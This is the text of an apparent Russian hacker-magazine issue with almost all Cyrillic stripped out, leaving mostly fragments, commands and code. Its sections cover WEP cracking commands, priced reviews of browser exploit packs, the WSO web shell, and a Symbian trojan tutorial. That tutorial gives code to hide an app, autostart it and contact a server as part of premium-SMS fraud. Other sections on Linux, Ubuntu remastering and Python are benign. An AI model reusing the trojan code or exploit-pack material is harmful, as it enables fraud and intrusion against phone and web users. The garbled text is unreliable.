, , WEP.
.

WEPLAB
64- WEP-.
128- k 128. ,
64- , 128-.
64- : ,
- . . :
( ), . - ,
. :


weplab -b dump.pcap
//
cat slovar.dict | weplab -y dump.pcap
//
weplab -r dump.pcap
//

.
. , ,
WEP . ,
, ?
? , ?
, ? ?
.

WEPLAB
, ,
, , : ,
.

WEP. ,
WEP-
WPA-! , ,
.

Aircrack

info


.
.

warning

! ,

!

Aircrack Windows

. , :
weplab,
. ,
. 50.000
64- 200.000 128-
, . :
( ,
). 64- WEP- 128- 10/1
(20.000 , 2.000 20 ),

weplab ( --perc). 80%


(
100% 1.4),
! , , 400.000
64- WEP, weplab.
, 5 .

20 50.000 128- WEP
5.000 WPA.
wepcrack. 200.000
, .
!


Aircrack , WPA

AIRCRACK
. aircrack-ng. WPA, WEP.

MAC-
. ,
? .
wep-.
WEP, . :
PTW (Pyshkin, Tews, Weinmann) FMS (Fluhrer, Mantin, Shamir).
. :
aircrack-ng dump.pcap
//
aircrack-ng -b 00:00:00:00:00:00
//
aircrack-ng -y
//

AIRCRACK-NG
. :
WPA, aircrack WPA, ,
WEP- ( - ) -


. 1.000.000 128- WEP-


1.000 WPA. aircrack
, , WPA.
,
. ,
(aircrack-ng a1 dump.pcap), .
, ,
.
,
. , ,
450.000 128- WEP,
, 200.000 , 128-
WEP-. Aircrack ( 200.000 ).
(aircrack-ng d XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:
XX:XX:XX). 450.000 , !
100 , : aircrack
( ; ,
) 9 100.
aircrack
. , aircrack-ng
. , ,
, IDS.

weplab

(
,
, ) , , --.


, , ? ,
! , ,
486-
.
USB-.
USB- ( WiFi-)
busybox.
.
, .
, ,
, .
,
.
, , :
aircrack-ng.
aireplay,
(
).
r fakedump.pcap
.

. txpower
iwconfig. (iwconfig eth1
txpower 15) (iwconfig eth1 txpower
30mW). ,
sens, rts, frag, power .
IDS .
, honeypot.
.
-
.
tcpdump ,
.
,
, .

Aircrack: !

,
, , IV
,
WEP. , ,
128- 104 ,
64- 40 . . - .


. , ,
. ,
.

.
, ,

, .

oxod.ru. z

weplab

links

aircrack-ng.org

aircrack.
weplab.sourceforge.net weplab.
oxod.ru .
,
.
www.cdc.informatik.tu-darmstadt.de/aircrack-ptw PTW.
aircrack-ng.org/doku.php?id=links&DokuWiki=d63d97ef16cadcdb9e1281e83d4e5875#technique_papers
WEP.

BALASEK

-. :
, , , ...
, . ,
, n- . ?
, - .
( z
, ,
).
,
(, , ..),
.
,
,
, exe.
.
,
. , , .
,
iframe-, ,
.
, .
(
).
,
.

?
, :
1.
2.
3.
4.
5.


, ,
Fiesta. 2.4,
:
7 ,
Acrobat <= 8.1.2
4/5/6 30%
9.2 15%
( //)
$700

, ( ) 30%, , , .
,
. , .
:).
Unique Pack 1.1 Full.
, :
1. MDAC ()
2. PDF VIS PDF-
(v.8.1.1 + v.8.1.2)
3. MS OFFICE SNAPSHOT
4. IE 7 XML SPL XML IE 7
5. FF EMBED
30%

$600 + $100


.

Armitage

G-Pack:
- 30%
IE <= 6 , IE 7

,
$100

: ,
-. -

:).
Icepack. :

IP

ftp- ftp-

(
, )
(,
exe)
$200

Fiesta


IP

.


,




:
SQL
TEXT DB
TEXT-

-


(
, , ..)
$1000

,
. , ,
USA- . ,
, , .
.
Infector by xod.
:

, .
,
.
. ,
, .
, , , :).
Neosploit-2, , , , , , . , :


PHP-
-

,
.
( )
, -


G-Pack
ICE-Pack
javascript-

exe ( 1 )
. exe-
, exe

IP
, , ,

IP (
)
. ,
exe.
(, )
IE FireFox
$1500

,
. , . -
. ,
, :).


,
web-. Sutra TDS.
:
URL:
1. ()
2. ( URL)




:
1. ( GeoIP)
2. / ( )
3. (/ )
4. IP
5. HTTP_REFERER
6. HTTP_REFERER
7. IP- IP-
8.

: / / / /
/ / / /




/
.
UPTIME BOT
URL. URL , ( 4** 5**), UPTIME BOT URL ( )
URL
UPTIME BOT URL
, , UPTIME BOT URL
UPTIME BOT

$100,
. , .
!
, 2-3 ,
.

exe :).


,
- . , , . 50%
- 20% USA.

. ,
, , 1-2k .
.
, g
. z
R0ID
/ R0ID@BK.RU /

:ADVANCED TRAFFIC
DIRECT SYSTEM
: *NIX/WIN
:ADVANCED SCRIPTS


.
, ,
, Advanced Traffic Direct
System .

(aka TDS),
. ,
, :
,

( GeoIP)
( IP cookies)
URL
.
:
1. Primary-: ,

2. Secondary-:
,

(confg.php) TDS.
:
$UseCron (On/Off) /


$UseURLCron (On/Off)
; Off
URLs
$CheckURLTimeOut
,
, , .
= 5 , ,
$OptimizeTables (On/Off) /
. ,
TDS

$DoCronLog (On/Off) /

$PassQueryString (On/Off) ,
out.php (
URL)
$VisualTimeOffset . , , ,
.
, , ,

.
Settings, :
New Password, Confirm Password

Alternative URL URL,
, -

Path to GeoIP GeoIP, , /usr/local/bin/geoiplookup.


Unknown
Save full stats ,

Check URLs
URL .
URL

. .
, :

1. Can't open file: tbl_name.MYD


tbl_name
- .
:
a) REPAIR TABLE tbl_name
( tbl_name
)
b) repair.php
(./r_admin/tools/repair.php),

2.
Unknown GeoIP,
GeoIP,
Settings
3.
Settings ,
./r_admin/config/
config.php, ,

: DLSECURE MODULE
: *NIX/WIN
: NUR, GREEN_BEAR AND WINUX
-,
.
,
,


PHP-.

,
. , -, .
DLsecure module. ,

php-.
PHP-,

.
:


IP-
XSS

SQL-

include-
DDoS-

ftp- ssh-

,
XSS/SQL/INCLUDE-, variables.php:
$bad_sql = array("union","select","from","where","insert"," or "," and ","/\*","",);
$bad_include = array("http://","../",".php",".phtml",".php3",".php4","./",".php5",);
$bad_xss = array("<script","document.cookie","javascript:",);

.
. , - (
z).
( )
,
,
. ,

( ).
: , ?.
, , ,
Ponchiks universal fake
:). ,
Ponchik,
. ,
:

1. /
2.
3.
-

1.
2.
3.
4.
:)

. ,
. (aka )
,

,
. , , ...

: HIASM
: WINDOWS 2000/XP
:HIASM STUDIO

: PONCHIKS UNIVERSAL
FAKE
: *NIX/WIN
: PONCHIK

:)


,
,
/PHP-, /++,
!
. HiAsm. ,

.
,
- . .

, , , .

( ),
, ,
.
, ,
:).

: WSO
: *NIX/WIN
: ORB

web-shell
,
-.
,
. ,
, web shell by
oRb ( WSO). -, ,
,
. WSO
:).
16 ,
:



SQL-
, , , , , ,
,
, , ,

POST-
PHP-

-
,
Safe-mode ( ,
)
FTP/MySQL-
C/Perl

, - *nix-.
,
, , :).z


>>
MIFRILL
/ MIFRILL@RIDDICK.RU /

, .
, , ,
. (
), . , Windows .
WHO IS MISTER RUSSINOVICH?


, (Mark Russinovich) .
, . ,
, , , !
, ,
,
, ,
Windows. 2006 Top 5 , eWeek, .
, , (,


) -,
: .
, IBM ( ).
. 1996 ,
(Bryce Cogswell),
, Winternals Software LP.
freeware
MS Windows. ,
,
, .

RootkitRevealer


Sysinternals.com ( ntinternals),
60 . , ,
Process Monitor ( Filemon Regmon), Process
Explorer, RootkitRevealer NTFSDOS, , , (, NTFSDOS NTFS- MS-DOS).
,
NTFS DOS. , ,
, .
,
. , Winternals
Administrator Pak. ,
Linux, Windows, , .
64- . , ,
Microsoft, .

. 2006 Winternals Software
, Sysinternals
. ,
, Windows,
, .
, Microsoft,
Winternals Software.
Sysinternals . , ,
,
Linux, NT Locksmith,

. , Microsoft
. ,
, Sysinternals
.
Microsoft Technical Fellow, , ,
.
,
(Platform and Services Division).

, ! :)


,
malware-. ,
2006 :).

, ,
,
. 2005
, Microsoft. ,
RootkitRevealer,
, . ,
: ,
, ,
,
, RKR.
RootkitRevealer, Sony BMG Music Entertainment,
Amazon.com. ,


HKLM\System\CurrentControlSet\SafeBoot, .
, , , ,
, .
IT- , , .
Sony,
, , ,
. , , , ,
, . ,
, , .
,
. , , Microsoft Windows Internals
( Microsoft Windows).
,
TechNet Magazine Windows IT Pro ( Windows NT
Magazine). , ,
http://blogs.technet.com/MarkRussinovich,
http://blogs.technet.com/mark_russinovich
.
Microsoft.
, , ,
. , , Windows 7 , ,
Winternals . . ,
,
, , ,
, . , , , -

Sysinternals

DRM (Digital rights management), ,


. ,
, Sony ,


,
Microsoft. ,
,
. z

>> unixoid

/ DHSILABS@MAIL.RU /



UBUNTU 8.10

,
. .
, , .

. , .
:
Reconstructor (reconstructor.aperantis.com).
ISO- Ubuntu (www.ubuntu.com).
6 Linux-.
.
Reconstructor ISO- Ubuntu,
. , (2.8)
Hardy, Ubuntu.
, Intrepid
Ibex (Ubuntu 8.10), .
6 ,
LiveCD Ubuntu 5 +
( 700 ).
, .


, (
). sudo. ( , root). Next ,


LiveCD .
. LiveCD, ,

, Ubuntu.
, ISO-
Ubuntu . ,
Windows-, 700
Linux- ( 6
openSUSE ). .
, LiveCD Ubuntu
( ). root,
.
! LiveCD Create Remaster Directory, Create Root Directory, Create Initial Ramdisk
Directory. ,
.
, , (

, ,
..) ,
. -.
. , 5-10.


, .
Boot Screen.
Live CD Splash GRUB.
GIMP. : PCX, , 256
, 640480 800600. Live CD Text Color
GRUB.
GRUB, .
Ubuntu , Usplash Filename.
SO- gnome-look.org,
. GIMP,
, PNG ( 640480,
800600 , , 256 )
Generate. PNG-,
SO-,
Usplash Filename.
. ,
.
Usplash. 640480,
800600. Usplash
LiveCD, Usplash .
, , Usplash 800x600
, LiveCD.
!
, LiveCD
Usplash,
Usplash Ubuntu. :

, Ubuntu. , Usplash,
.

gnome-look, , ( : ,
Background Color).
Desktop , Theme ,
.

APT OPTIMIZATION
Apt ,
.
, . . ,
Ubuntu 8.04, ,
Ubuntu 8.10.
( ),
Optimization LiveCD.
, LiveCD
(
).
, , , .
. Modules
. , GIMP OpenOffice .
MPlayer, Flash-
Firefox. (Execute) (Run on boot). , MPlayer
, MPlayer Execute
Apply.
(Estimated ISO Size).
702 , 745 .
,

links
Denix:
denix.dkws.org.ua.

:
gnome-look.org.

Ubuntu (. )
:
citkit.ru/articles/222.

Boot Screen

GNOME
Login GDM- (GNOME Display
Manager).
. ,
. gnome-look.org,
(),
, .
Splash Screen ,
. -,

info

,
?
GIMP,



256.

PNG-.

?

gnome-look.org.

.
:

GIMP,

gedit.
.


Ubuntu
Customization Kit,
, ,
.
UCK
Ubuntu
8.10.


Modules

Custom apt-get (install) Apply.


, , 1 2
3. ,
. ( ), , ,
. , Custom apt-get (remove)
.
, .
root- , .
, .
(
),
sudo mc mc (
?) root.
, ISO.
/media/disk/livecd.
initrd (, , ?),
remaster ( ISO), root (
).
?
remaster *.exe- autorun.ini.
1,3 . , ?
initrd/etc/casper.conf ,
GNOME ( Denix
session user):

Gnome

export USERNAME="denix"
export USERFULLNAME="Denix session user"
export HOST="denix"
export BUILD_SYSTEM="Denix"

,
, Apply
ISO. Next .

ISO
!
LiveCD, , Initial Ramdisk,
SquashFS Root, Live CD (ISO). LiveCD, , , ,
!
!
Filename LiveCD. ,
( 750 ),
ISO- . Description .
Next
.

ISO
(, Nero for Linux) .
GRUB. , .


Denix

.
GDM-.

. - .
LiveCD ,
, : Ubuntu,
, LiveCD,
LiveCD !
: ( ), . mc root
/var/cache/apt/archives:


! , :
( )
Usplash Ubuntu, ;
Examples Ubuntu;
GNOME Ubuntu;
.
Usplash .
sudo mc. ,
.
/media/disk/livecd, /media/disk/livecd/root.
/usr/lib/usplash LiveCD ( , /media/
disk/livecd/root/usr/lib/usplash). SO- Usplash.
Usplash- 800600?
usplash-theme-ubuntu.so. ,
usplash ,
. ,
400 , 2 . . /usr/share/example-content LiveCD (/media/disk/
livecd/root/usr/share/example-content). , ,
.
.
. ,
. , usplash ,
. . OGG
(
OGG oggenc) /usr/share/sounds.

/usr/share/sounds/ubuntu,
OGG- desktop-login.ogg
, GNOME.
, GNOME desktop-logout.ogg.
! ,
, .
Terminal :
$ sudo apt-get install <_>
$ sudo apt-get remove <_>

, , .

$ sudo mc

/media/disk/livecd/root
LiveCD. deb /var/cache/apt/archives:
$ mkdir deb
$ cp /var/cache/apt/archives/*.deb /media/disk/livecd/root/deb

LiveCD.
:
$ cd deb
$ dpkg -i *.deb
$ rm *.deb
$ exit

deb, ,
. : ,
, !
deb- , LiveCD . .

. , , !
: LiveCD
OpenOffice GIMP, ,
MPlayer, CD. 695 . ,
DVD. Denix 0.5 Full 981 .
OpenOffice 2.4 OpenOffice 3.0 Pro
, , MPlayer, Thunderbird, FileZilla. , . CD-,
, DVD? , , !z

>> unixoid
J1M
/ ZOBNIN@GMAIL.COM/

LINUX

Linux .

,
. Linux ,
. .
2007 . 2.6.20-2.6.23
2.6.20 , i386. 2.6.21
WMI (Virtual Machine
Interface), VMWare
. Linux
VMWare - . 2.6.23 Xen
lguest (Linux Linux).
2.6.20 KVM (Kernelbased Virtual Machine).
SVM/AMD-V Intel VT. ,
,
.

qemu .
2.6.21 KVM
/ .
2.6.23 KVM .

Fault injection, .
,
.
SGI Linux Slab allocator
SLUB, SMP- . Slab allocator , , .
2.6.23.
.
, Devicescape, WiFi-. , , MAC, WEP, WPA, QoS,
802.11g ,
.
FireWire-. , ,
.

Linux Kernel Summit 2007


CFS (Completely Fair
Scheduler). , ,
rbtree,
.
CFS ()
(HZ).

2.6.24 25
Control Groups
cgroups. ,
, .
,
.
,
( ),
Task Control Groups,
CFS Cpusets
( ).
CFS. 10%
Fair Group Scheduling,
. (, multimedia, net).
, Documentation/sched-designCFS.txt.
Tickless x86-64, PPC, ARM,
MIPS UML (User Mode Linux).
,
.
MMC
SDIO (Secure Digital I/O) SPI. , , SDIO (, ),
, - SD
(, GPS-, - ..).
Wireless USB,
USB-. ,
USB- , .
, 0 /sys/bus/
usb/devices//authorized.
.
.
Large Receive Offload (LRO). TCP-
, .

2.6.25 17
Memory Resource Controller
(Task Control Groups).
,
. OpenVZ
.

. ,
,
.
proc
pagemaps,
,
.
SMACK,
LSM-. SMACK (, , ..),
, SELinux.
, LatencyTOP (www.
latencytop.org) . LatencyTOP,
.

, Exec Shield (people.redhat.com/mingo/
exec-shield)! brk()
,
.
Volkswagen CAN
(Controller area network)
.
ACPI, API
( ,
).
Ext4 , :


Ext4 IOZone

1. , 64 .
2. .
3. , ,
.
4. inode NFS .
5. Extent-based (
).
6. .
, , .
MN10300/AM33,
c NAS Orion.
2.6.26 14
, mount
--bind, 14 .
, root-, .
KVM,
, IA64, PPC S390
.
, 2.6.22,

Kernel.org Linux-

802.11s, Open80211s (www.open80211s.org).


Per-process securebits
setuid-
, (
).
cgroups (Control Groups)
.
,
memtest (www.memtest.org),
.
memtest .

/sys/class/bdi,

/proc/$PID/mountinfo.
PCI Express ASPM
(Active State Power Management).
. ,
KGDB,
. !

2.6.27 9
Linux UBIFS,
Nokia
flash- . UBIFS
JFFS2
, ,
.
UBIFS, OMFS (Sonicblue Optimized MPEG File System support),
MPEG-
-.
Multiqueue networking,
. ,
Wireless Multimedia
Extension, ,
.
, , close-on-exec.

Changelog Linux 5.7

fork().
, ,
.
,
kdump kexec. , .
kdump , kexec . ,
ACPI.

SCSI- SATA-, SBC Data Integrity Field
External Path Protection .
mmiotrace, /, .
, , .
firmware .
/lib/firmware make modules_install
.
Ext4 .
write()
,
( , ). . ZFS, XFS, Btrfs Reiser4.
gprca (mxhaard.free.fr/download.html)
230 USB-.
: Marvell Loki.

2.6.28 25
Ext4 . , .
GEM (Graphics Execution Manager), . GEM
Intel
.
, (
, !) .
GEM i915,
3D- 50%.
Wireless USB

KGDB

UWB (Ultra Wide Band), - (3.1-10.6 )


( 10 ). ,
UWB-, Wireless USB 1.0.

. - (
), ,
(, malloc()).
cgroup ,
.
. ,
.
. Linux
!
netfilter
TPROXY iptables. Multiqueue networking .

Linux, ,
, , , :
1. Linux
. , , , , .
2. Linux , ,
-, , . , , .
3.
, (,
, ).
4. ,
.
5. . z

>> coding

/ ZANITO@GMAIL.COM /

-, ,
. , . , , . ,
, . z , ,
.
.
! -,
, ? -,
, . -,
, .
,
.


, :
1. ,
xakep.ru.
2.

-.
3. , ,
.
4. ,
: , . -.
5. .
. ? ,
. ,
, , , , .
, ,
.
? , , :
1. , .
2. ( !) . ,
.
3. , /, , /
.
4. ,
, , , ,
, .
5. , ,
.
,
. ,
, , . .
, ,
, .

,
?
.
:
1. ( ) ;
.
2. , ,
, .
3. ,
, , .
4. .
, MS Project. ?
, , , ,
.

, ,
, .
, ,
. , .
, ,
. ,
, , ,
, .
-, -,
( ),
.
.
, , ,
.
,
. ,
-
- - , .
, .
. ,
.

.
, .
. , ,
. ,
, 666 ,
- . ,
! , .
.

,
71, z
, z , .
, (
CuTTer). , . -
:
. ,
.
,
. ,
HTML - 250000 .
, . , .
, , , ,
,
,
, .
-][-. ,
: ,
, ?
. - , -,

.


,
.


?
-
, :
.
,
, , ,
. ,
, -
. , ,
4-5 15-20 .
20-30
.
30, 40,
50 , . 40-50
. ,
, ,
. , .
1-3 ../,
, 10-15 ../, - .
, 17-20 ,
.
- ,
.

.
- .
.
, .
, ,
, .
, (, !),
.

- ( ,
PHP+AJAX) , ,
. Java, -
Web. -
;
.
, ,
, -
; ,
.
, , ,
Flash HTML. Google -
freelance programmers,
. , ! , ,
, , , ,
.
.
, . , , ,
, .
,
. ,

,
. . ,

. ,
.

.
. , ,
,
, .
, . ,
.
,
.
? ? , ,
.
, ,
. ,


( , ).
, ,
,
. ,
, ,
.
, ,
- . ,
, - . , ,
( ). ,

.
, .
, , , .
,
/, ,
.

, .
? ,
, 2 .. ,
10 ..? - ,
( ,
) open-source . ,
.
( ),
. -
1-3 . ,
, , .

.
.
. ,
? , VIP Depeche Mode . ,
, . .
.
, , .
, ,
- , . , .Net 4.0
, ,
ASP.NET MVC!
, ,
. .
.
, .
, ,
. 2-3
, .

P
, , , , . ,
. , .
-, Zihotki, ASP.NET,
,
. , .


. ,
, ,
. , , ,
, , , ( ).
,
. , -
, .

, .
, .
, , .
, ,
. , ,
, .
. ,
- , . . . .
: ,
, . , . ,
, , .
, ,
4-5 .
. , ,
. , .

PHP. .NET Java
( ),
Pyton Ruby.
Zihotki


!
, , ,
, .
,
,
.
( ), fuck .
,
- , ,
. ,
.
, . , ,
.

?
; ,
,
. .
. z

>> coding

/ ALEKSEY.CHERKES@GMAIL.COM /

PYTHON
Python .
, Star Wars: Episode II
Tommy Burnette, , Industrial Light
Python Google, ,
. Google Python,
, .
Peter Norvig, , Google, Inc.
, Python.

: ,
, - .
, , ;). , Python
c .
. , , ,
. , Python . 2,
10 , Java!

LETS PLAY!
Python .

. ? >>>

, . ( ).
>>> 2 + 2
4

,
:).
>>> tax = 12.5 / 100 #
>>> price = 100.50
>>> price * tax
12.5625
>>> price + _
113.0625
>>> round(_, 2)


. ,
>>> for x in list:
...     print x, len(x)
...
Python 6
is 2
cool 4
! 1

Emacs IDE Python

. ,
.


, - ,
Python ,
Python
. ,
.
.
Python ,
.
- . :
>>> # .
... # .
... a, b = 0, 1
>>> while b < 10:
...     print b
...     a, b = b, a + b
...
1
1
2
3
5
8

Python for
( foreach).
, ? List
. ,
.
. ,
, list.
, , ,
.
, ( ).
(
) .
range(), -.

: ( -),
( ), ( ), (- )
( ).
, .
, , (
,
). ,
,
. -,
..
, .

links
http://python.org
,
,

.
http://www.intuit.ru/
department/pl/python

.
ru.diveintopython.
org/toc.html


Python.

Python MatLab

, ( !) ( , ,
). .
, !
,
. , , -
. . ,
Python . ,
. , , .
- .
( ).
Python x
y, .
x, y = y, x!
, for.
:
>>> # .
... list = ['Python', 'is', 'cool', '!']

ForecastWatch.com Python


Python . ,
,
(, ..).
(, ), .
, .
, .
:
>>> def make(a):
...     return lambda x: x**a
...
>>> f2 = make(2)
>>> f4 = make(4)
>>> for i in [1, 2, 3]: print f2(i)
...
1
4
9
>>> for i in [1, 2, 3]: print f4(i)
...
1
16
81

.
. Python () . lambda- ( , lambda-,
). lambda
x: x**a , x
, (** ).
make.
, .
(closures). , .
a,
.
make, .
. , a, ,
. make
a. make (!),
. , :).
, Python . , -
(). ,
. . : ,
(- - ),
.. , ,
,

Python
. :
CPython .
. , Python ISO ANSI,
CPython. ,
. -,
. *nix-, Win ..
Jython, IronPython JVM.
, Java -.
Java- Python-. . ,
Python.
IronPython , Jython, .Net. .Net- Python-
.
CPython-.
Stackless Python CPython. .
(GIL). ,
,
.
PyPy Python, Python!
.
(Javascript, LLVM, CLI
.).
PyS60 Python Nokia.
CPython c
Symbian OS.
( ), ,
. Python
.
. :
>>> def logger(f):
...     def ret(*args, **kwargs):
...         print "enter in", f.__name__
...         f(*args, **kwargs)
...         print "exit from", f.__name__
...     return ret
...
>>> @logger
... def foo(x):
...     print "foo:", x
...
>>> foo("hello")
enter in foo
foo: hello
exit from foo

foo @logger.
, . ,
@logger foo
: foo = logger(foo). , foo ,
@logger , foo.
, ,
.

Python,

, : def logger(f):
return f. ,

, Python - , - - . . , , , , Python
. .
.
, ,
, , .
, - .
, ,
. obj.f(),
obj, , ,
f. . .
Python . !
. , !
.
, - . ,
Python . (
!). .
, , .

Python . , Python (Batteries Included). ,
(CPython) , . :
;
;
;
;
, , ;
( );
- (mime,
smtp, pop, jsoon, http, ftp, nntp telnet, cookie, cgi .);
xml- ( dom sax-);
(zip);
(
);
framework -;
;
;
;
;
;
(md5, sha, hmac, hashlib);
( , );
(IPC);
;
;
c Tk ( GUI).
, ! ,
Python.
. ,
,
. Python, ,
! Python
.

Python , ,
, -.
, Python . , , ][
:). z

>> coding

/ ROOT@DTARASOV.RU /

CEikonEnv::Static()->
RootWin().EnableReceiptOfFocus(
EFalse);
//

CEikonEnv::Static()->
RootWin().SetOrdinalPosition(1000,
ECoeWinPriorityNeverAtFront);

#include <startupitem.rh>
RESOURCE STARTUP_ITEM_INFO
blacklist
{
executable_name = c:\\sys\\
bin\\YourApp.exe;
recovery = EStartupItemExPolicy
None;
}

-
SYMBIAN

void CMegaTrojAppUi::
HandleForegroundEventL
(TBool aForeground)
{
switch (aForeground)
{
case ETrue:
{
CEikonEnv::Static()->RootWin().
SetOrdinalPosition
(0, ECoeWinPriorityNormal);
TApaTask task(iEikonEnv>WsSession());
task.SetWgId(CEikonEnv::Static()->
RootWin().Identifier());
task.SendToBackground();
}
break;
}
}

SYMBIAN? !

, , sms .
, . , .

- Nokia,
Samsung LG S60.
.


. ,
,
, ,
( ,
sms, GPRS ..). ,
, :
1. , ,
sms, . 93- 103- z.
2. - SMS.
.

Premium SMS 0,5 $ 5$ , ( ) .


3. ,
GPS-,
, , .
.
,
.
, , -.
- , ,
-.
, .
Premium SMS ( ,
) .
Symbian. ,
.


,
, ,
sms, .
,
.
,
,
, , , sms. ,
. , ? ,
Symbian tcp sockets ( HTTP
over TCP)
(Internet Access Point). ,
, .
, ,
.

. ,
:
(
, task list).
.

(IAP).
,
.

.
.
, , ,
, Symbian 9, ,
SymbianSigned.


warning
z
,


.

.
, Symbian,
, , ,
.
, , ,
Symbian ( ).


, .
Carbide C++,
Visual Studio.NET Carbide.
VS. Symbian Hello
World Application (,
SDK, SDK
). .
, :
1) , AIF_DATA Symbain
7.x-8.x APP_REGISTRATION_INFO Symbian 9.x.
, UID .
:
hidden = KAppIsHidden;


.
2) -

UpdateTaskNameL,
Task-:
void CMegaTroj::UpdateTaskNameL
(CApaWindowGroupName*aWgName)
{
CAknDocument::UpdateTaskNameL(aWgName);
//
UpdateTaskNameL
aWgName->SetHidden(ETrue);
// -
aWgName->SetSystem(ETrue);
}

3) Symbian 7/8.
AppUi- ,
:
CEikonEnv::Static()->
RootWin().EnableReceiptOfFocus(EFalse);
//
CEikonEnv::Static()->
RootWin().SetOrdinalPosition(-1000,
ECoeWinPriorityNeverAtFront);

Symbian 9.
Symbian 7/8 , Symbian 9
, .

CAknViewAppUi ( , , AppUi-)
HandleForegroundEventL, ,
:
void CMegaTrojAppUi::HandleForegroundEventL
(TBool aForeground)
{
switch (aForeground) {
case ETrue:
{
CEikonEnv::Static()->RootWin().SetOrdinalPosition
(0, ECoeWinPriorityNormal);
TApaTask task(iEikonEnv->WsSession());
task.SetWgId(
CEikonEnv::Static()->RootWin().Identifier());
task.SendToBackground();
}

Symbian 9. , , .
, :
1) (*.rss), UID3 .
, UID3 0x12345678, 12345678.
rss. :
#include <startupitem.rh>
RESOURCE STARTUP_ITEM_INFO blacklist
{
executable_name = "c:\\sys\\bin\\YourApp.exe";
recovery = EStartupItemExPolicyNone;
}

2) MMP- :
break;
}
}

,
, task- ,
-
.



Symbian 7/8 Symbian 9.
Symbian 7/8. Symbian OS 9. ,

recognizers. Recognizers MIME- , , ,
,
.
, MIME-,
Series60 , Document Handler. ,
, , MMS-, WAP-, bluetooth
.. ,
, - . Series60 embedded
launching, ,
, ,
.
.
WEB- jpg-.
Image Viewer, .
MIME (UID).
Symbian OS ,
MIME-, recognizers.
recognizer dll, mdl c:\system\recogs .
MIME- / UID
recognizer.
.
:
recognizer *.bt ( ; ).
recognizera, , , , ,
, .
, , ,
. -
.
START RESOURCE 12345678.rss


TARGETPATH \resource\apps
END

3) pkg- : C:\Symbian\9.1\S60_3rd_MR\
epoc32\data\z\resource\apps\12345678.rsc"-"c:\private\
101f875a\import\[12345678].rsc.
c:\private\101f875a\import ,
.
, , Symbian. .

, . :
1)
. GPRS-, WAP-
MMS- . CApSelect, ,
, (GPRS/WAP/MMS). ,

( CApSelect) ,
( , ,
).
2) ,
echo-, ( ) ,
. , -
0x01,0x02 0x03 , .

,
. , ..
.
3)
.
, ,
CApSelect. AppUi AppUi (,
, ):
CCommsDatabase* commDb = CCommsDatabase::NewL(
EDatabaseTypeIAP);
CleanupStack::PushL(commDb);
iSelect = CApSelect::NewLC (*commDb, KEApIspTypeAll,
EApBearerTypeGPRS, KEApSortNameAscending);
iConnectionEnabled = iSelect->MoveToFirst();
CleanupStack::Pop(iSelect);
CleanupStack::PopAndDestroy(commDb); //commDb


Premium SMS
links



Symbian
http://dtarasov.ru.


forum.nokia.com.

dvd

, , sms - .
0,06 $5. sms Premium SMS.
, , ,
. , , -
(http://www.smstraffic.ru), .
:
1) .; (
- -, WebMoney ).
2) /-. , -
, .
, , , ,
-. - 12345
1234; 12345 , , .
3) , .
, sms ,
. , ,
.

commDB . ( CApSelect SDK). .


TCP,
forum.nokia.com. ,
observer (MtcpipIapCheckEngineObserver), TestCompleted, .
MTcpipIapCheckEngineObserver AppUi.
CIapCheckTcpEngine,
( ). ,
CIapCheckTcpEngine
AppUi TestCompleted,

. TestCompleted :
void CMegaTroyAppUi::TestCompleted
(TIapTestResult aTestResult)
{
if(aTestResult == EIapNotUsable)
{
GetNextIapId(); //

}
else
{
HandleCommandL(EConnectToServer);
//
}
}

, , .


,
sms,
( ).
PHP +

MySQL. . :
- http://yourhost.ru/megascript.php;
XML .
, . ,
.
forum.nokia.com
http-, GET-. AppUi :
iHTTPEngine->GetRequestL(iUri,iIapId);

iUri url , , iIapId , .


,
, sms.

SMS

, , http://dtarasov.ru.

, Symbian 9,
.
Symbian Platform Security, Symbian OS 9.1
. , ,
:
1) IMEI ( )
Symbian
Offline Signed.
IMEI, .
2) Symbian Express Signed
Certified Signed. Express Signed Certified Signed
, (20$),

.

. ,
. ,
,
- . Certified Signed .

!
,
IMEI ,
.
Express Signed. , Express Signed, Publisher ID. $200
,
TrustCenter. Publisher ID
http://dtarasov.ru. Publisher ID
:
1) trustcenter.de/order/publisherid/dev,
.
2) e-mail
,
().
3) - .
( ).
4)
, . ,
Express Signed
SymbianSigned.com.
, Publisher ID . . - . , Trustcenter
, . Publisher ID
Express Signed
. :
1) .
2)
.
3) - SymbianSigned
.
4) , , .
5) , Publisher ID.
4 5 ( ), ,
,
. Publisher ID
, , ,
. Symbian Platform Security. , ,
? ,

, .
,
.

HAPPY END
, Symbian
, .

.
. ,
, , .
,
, ,
! z

>> coding

/ ALEKSEY.CHERKES@GMAIL.COM /

PYTHONE

Python ,
.
, .
, Python ,
. :
.
Python .

.
,
,
. ,
, Python.


Python ,
. .
,
.
C,
, .
, , , .

, map(operator.add, l1, l2), , , map(lambda x,y: x+y, v1, v2).


.
Python (immutable objects).
, . ''.join(seq) ,
+=.
. ,
. ,
. %
. .
, , , . ,
range(n) n.
xrange(n) ,
,
. generator expressions,
list comprehensions.
, . , Python
, :).
, , , N (a in b)
, ,
.
, , .
- ,

. , . obj.foo()
.
, .
, .
:
, .
, , .
.
, . , , :
module_name = None
def delay_import():
    global module_name
    if module_name is None:
        import module_name

module_name
delay_import().
. . NumPy (
,
).
MatLab. Python ,
MatLab, NumPy + Python open-source ,
. , Python- ,
PyRex. , Python.
Python ,
,
Python!

. Python
(batteries included!). profile ( cProfile), timeit
hotspot.
Hotspot
C.
,
. ,
,
.
profile
.
, : ,
..
.
. profile profile.run('main_
function()'), ,
. .
( ) .
strip_dirs() :
import profile
import pstats
def main():
    #
    pass
profile.run('main()', 'main_prof')
stats = pstats.Stats('main_prof')
stats.strip_dirs()
stats.sort_stats('time')
stats.print_stats(5)

, ,
main_prof. stats ,
, .

,
( stats.add()).
cProfile , profile.

. , cProfile , profile Python. cProfile
, . profile, ,
Python.
timeit . ,
.
.
:
from timeit import Timer
x = 123
t1 = Timer('x * 2', 'from __main__ import x')
t2 = Timer('x + x', 'from __main__ import x')
number_of_calls = 10**7
time1 = t1.timeit(number = number_of_calls)
time2 = t2.timeit(number = number_of_calls)
print time1 / time2

, 1.26. ,
1520% , 2.
.

JIT-
, ( , !),


links
wiki.python.org/
moin/PythonSpeed/
PerformanceTips


.
Must read!
www.python.org/doc/
essays/list2str.html
Python Patterns
An Optimization
Anecdote.
Python .
wiki.python.org/
moin/PythonSpeed
,
.

Gprof2Dot

. , , ,

.
:
, ,
, ? ,
(Python) - (-
).
. -

(, Java).
, .
-.
- , . ! ,

-, ?
(, .Net) JIT.

2001 Python 1.5


3d- Blade of Darkness,
. , 370 ,
!

. Python +
